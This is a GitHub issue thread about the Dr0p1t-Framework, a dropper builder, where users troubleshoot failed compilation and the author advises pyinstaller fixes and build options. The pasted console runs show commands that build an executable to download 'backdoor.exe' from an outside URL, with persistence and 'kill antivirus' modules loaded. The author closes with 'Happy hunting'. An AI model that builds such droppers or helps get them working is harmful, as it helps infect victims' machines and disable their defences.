### ISSUE TITLE
Compile 

### ISSUE THREAD

**Issue by jvzior** [D4Vinci/Dr0p1t-Framework#7]
Solved ?[

*] Creating DR0P3R..
 [*] Adding startup function..
 [*] Adding task function..
 [*] Adding kill antivirus function..
 [*] Saving the final file..
 [*] Compiling the final file to exe..
 [*] Compressing the final file..
Traceback (most recent call last):
  File "Dr0p1t.py", line 216, in <module>
    main()
  File "Dr0p1t.py", line 205, in main
    make_copy( os.path.join("temp","dist",file_name),os.path.join("output",file_name) )
  File "Dr0p1t.py", line 53, in make_copy
    old_file = open( old,"rb" )
IOError: [Errno 2] No such file or directory: 'temp/dist/Your_daily_malware_54'

**Comment by D4Vinci** [comment]
This happens because of pyinstaller didn't compile the file for some how,make sure you run the script as root if you are on linux.

Try can also try checking if pyinstaller on the last version with pip by command
```
pip install pyinstaller --upgrade
```
if this didn't work try reinstalling pyinstaller by 
```
pip uninstall pyinstaller
pip install pyinstaller
```
You can also try use --nocompile option to compile the script by your self or you can replace line 190,191,192 in dr0p1t.py with this line : 
`p  = subprocess.call( command.format(file_name+".py") )`
which will give you output so I know where's the error from

**Comment by Indeserpen** [comment]
Can confir same problem! Tried it out on kali linux rolling and also backbox vmware!!

**Comment by D4Vinci** [comment]
try what I said before or wait for the next version

**Comment by Indeserpen** [comment]
So i changed the lines you told above here is output and some screens!
└──╼ $sudo ./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx

    _______                                                           ...-'  |`.
    \  ___ `'.   -- [D]r0p1t [F]ramework --   _________   _...._      |      |  |
     ' |--.\  \                               \        |.'      '-.   ....   |  |
     | |    \  '  .-,.--.      .-''` ''-.      \        .'```'.    '.   -|   |  |        .|
     | |     |  ' |  .-. |   .'          '.     \      |       \     \   |   |  |      .' |_
     | |     |  | | |  | |  /              `     |     |        |    |...'   `--'    .'     |
     | |     ' .' | |  | | '                '    |      \      /    . |         |`. '--.  .-'
     | |___.' /'  | |  '-  |         .-.    |    |     |\`'-.-'   .'  ` --------\ |    |  |
    /_______.'/   | |      .        |   |   .    |     | '-....-'`     `---------'     |  |
    \_______|/    | |       .       '._.'  /    .'     '.                              |  '.'
                  |_|        '._         .'   '-----------'                            |   /
                                '-....-'`                                              `'-'

	Author  : Karim Shoair ( D4Vinci )
	Version : 1.1  Codename : Last Cobra


[+] Malware url : https://test.com/backdoor.exe

[+] Modules :
	Add to startup		: [ Loaded ]
	Add to task		: [ Loaded ]
	Kill antivirus		: [ Loaded ]
	Load BAT file		: [Unloaded]
	Load PS1 file		: [Unloaded]
	Load VBS file		: [Unloaded]
	Compress with UPX	: [ Loaded ]

[+] Loaded scripts :
	BAT file : None
	PS1 file : None
	VBS file : None

 [*] Creating DR0P3R..
 [*] Adding startup function..
 [*] Adding task function..
 [*] Adding kill antivirus function..
 [*] Saving the final file..
 [*] Compiling the final file to exe..
[Errno 2] No such file or directory: 'pyinstaller --noconsole -F Your_daily_malware_82.py '
 [!] Error in compiling file,are you sure pyinstaller is installed ?
┌─[mrevil@parrot]─[~/Dr0p1t-Framework]
└──╼ $pip install pyinstaller
Collecting pyinstaller
Collecting setuptools (from pyinstaller)
  Using cached setuptools-34.3.0-py2.py3-none-any.whl
Collecting appdirs>=1.4.0 (from setuptools->pyinstaller)
  Using cached appdirs-1.4.2-py2.py3-none-any.whl
Collecting packaging>=16.8 (from setuptools->pyinstaller)
  Using cached packaging-16.8-py2.py3-none-any.whl
Collecting six>=1.6.0 (from setuptools->pyinstaller)
  Using cached six-1.10.0-py2.py3-none-any.whl
Collecting pyparsing (from packaging>=16.8->setuptools->pyinstaller)
  Using cached pyparsing-2.1.10-py2.py3-none-any.whl
Installing collected packages: appdirs, pyparsing, six, packaging, setuptools, pyinstaller
Successfully installed appdirs-1.4.2 packaging-16.8 pyinstaller-3.2.1 pyparsing-2.1.10 setuptools-34.3.0 six-1.10.0
┌─[mrevil@parrot]─[~/Dr0p1t-Framework]
└──╼ $sudo ./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx

     ,gggggggggggg,    ,ggggggggggg,      ,a888a,     ,ggggggggggg,      88  ,ggggggggggggggg
    dP"""88""""""Y8b, dP"""88""""""Y8,  ,8P"' `"Y8,  dP"""88""""""Y8,  ,d88 dP""""""88"""""""
    Yb,  88       `8b,Yb,  88      `8b ,8P       Y8, Yb,  88      `8b888888 Yb,_    88
     `"  88        `8b `"  88      ,8P 88         88  `"  88      ,8P    88  `""    88
         88         Y8     88aaaad8P"  88         88      88aaaad8P"     88         88
         88         d8     88""""Yb,   88         88      88"""""        88         88
         88        ,8P     88     "8b  88         88      88             88         88
         88       ,8P'     88      `8i `8b       d8'      88             88   gg,   88
         88______,dP'      88       Yb, `8ba, ,ad8'       88             88    "Yb,,8P
        888888888P"        88        Y8   "Y888P"         88             88      "Y8P'
                                                -- [D]r0p1t [F]ramework --

	Author  : Karim Shoair ( D4Vinci )
	Version : 1.1  Codename : Last Cobra


[+] Malware url : https://test.com/backdoor.exe

[+] Modules :
	Add to startup		: [ Loaded ]
	Add to task		: [ Loaded ]
	Kill antivirus		: [ Loaded ]
	Load BAT file		: [Unloaded]
	Load PS1 file		: [Unloaded]
	Load VBS file		: [Unloaded]
	Compress with UPX	: [ Loaded ]

[+] Loaded scripts :
	BAT file : None
	PS1 file : None
	VBS file : None

 [*] Creating DR0P3R..
 [*] Adding startup function..
 [*] Adding task function..
 [*] Adding kill antivirus function..
 [*] Saving the final file..
 [*] Compiling the final file to exe..
[Errno 2] No such file or directory: 'pyinstaller --noconsole -F Your_daily_malware_26.py '
 [!] Error in compiling file,are you sure pyinstaller is installed ?
┌─[mrevil@parrot]─[~/Dr0p1t-Framework]
└──╼ $python Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
Traceback (most recent call last):
  File "Dr0p1t.py", line 216, in <module>
    main()
  File "Dr0p1t.py", line 78, in main
    prepare_folder("temp")
  File "Dr0p1t.py", line 71, in prepare_folder
    xx = os.mkdir(folder)
OSError: [Errno 17] File exists: 'temp'
┌─[✗]─[mrevil@parrot]─[~/Dr0p1t-Framework]
└──╼ $sudo python Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx

    _______                                                           ...-'  |`.
    \  ___ `'.   -- [D]r0p1t [F]ramework --   _________   _...._      |      |  |
     ' |--.\  \                               \        |.'      '-.   ....   |  |
     | |    \  '  .-,.--.      .-''` ''-.      \        .'```'.    '.   -|   |  |        .|
     | |     |  ' |  .-. |   .'          '.     \      |       \     \   |   |  |      .' |_
     | |     |  | | |  | |  /              `     |     |        |    |...'   `--'    .'     |
     | |     ' .' | |  | | '                '    |      \      /    . |         |`. '--.  .-'
     | |___.' /'  | |  '-  |         .-.    |    |     |\`'-.-'   .'  ` --------\ |    |  |
    /_______.'/   | |      .        |   |   .    |     | '-....-'`     `---------'     |  |
    \_______|/    | |       .       '._.'  /    .'     '.                              |  '.'
                  |_|        '._         .'   '-----------'                            |   /
                                '-....-'`                                              `'-'

	Author  : Karim Shoair ( D4Vinci )

	Version : 1.1  Codename : Last Cobra


[+] Malware url : https://test.com/backdoor.exe

[+] Modules :
	Add to startup		: [ Loaded ]
	Add to task		: [ Loaded ]
	Kill antivirus		: [ Loaded ]
	Load BAT file		: [Unloaded]
	Load PS1 file		: [Unloaded]
	Load VBS file		: [Unloaded]
	Compress with UPX	: [ Loaded ]

[+] Loaded scripts :
	BAT file : None
	PS1 file : None
	VBS file : None

 [*] Creating DR0P3R..
 [*] Adding startup function..
 [*] Adding task function..
 [*] Adding kill antivirus function..
 [*] Saving the final file..
 [*] Compiling the final file to exe..
[Errno 2] No such file or directory
 [!] Error in compiling file,are you sure pyinstaller is installed ?
┌─[mrevil@parrot]─[~/Dr0p1t-Framework]
└──╼ $




![screenshot at 2017-02-24 17-38-02](https://cloud.githubusercontent.com/assets/13330266/23320146/966acab8-faa7-11e6-9f7c-f18908e3818a.png)
![screenshot at 2017-02-24 17-38-32](https://cloud.githubusercontent.com/assets/13330266/23320156/9a6158f8-faa7-11e6-9ff6-fff7f6df445e.png)

Take look if i changed code like i should?

![screenshot at 2017-02-24 17-41-56](https://cloud.githubusercontent.com/assets/13330266/23320218/d5b37170-faa7-11e6-9480-03a8b728d5f2.png)
![screenshot at 2017-02-24 17-41-02](https://cloud.githubusercontent.com/assets/13330266/23320222/d9ba8754-faa7-11e6-81b3-1f3641050dae.png)

**Comment by Indeserpen** [comment]
And like you can see its Parrot OS, And python versions:
![screenshot at 2017-02-24 17-46-44](https://cloud.githubusercontent.com/assets/13330266/23320384/83beb0fe-faa8-11e6-8280-140651a0bf98.png)

**Comment by D4Vinci** [comment]
Thank you for your concern!
The problem is there's no correct support for cross-platform compiling till now but I will fix it in the next version.
Untill I finish the next version you can use `--nocompile` option to not compile the script and then use pyinstaller on wine to compile it by yourself and for windows you can add `--noupx` to the command variable and it will work!

**Comment by Indeserpen** [comment]
ok i gonna try and wait your next release! Idea and script is awesome!

**Comment by D4Vinci** [comment]
Checkout for the new release !
Issue fixed thank you 😃

**Comment by Indeserpen** [comment]
Confirmed! Thanks gonna have fun tmrw!!

**Comment by D4Vinci** [comment]
Happy hunting ;)

**Comment by Indeserpen** [comment]
Hello getting error when run on windows machine Import error Your_daily_malware....
had no time to debug, but will update issue after!
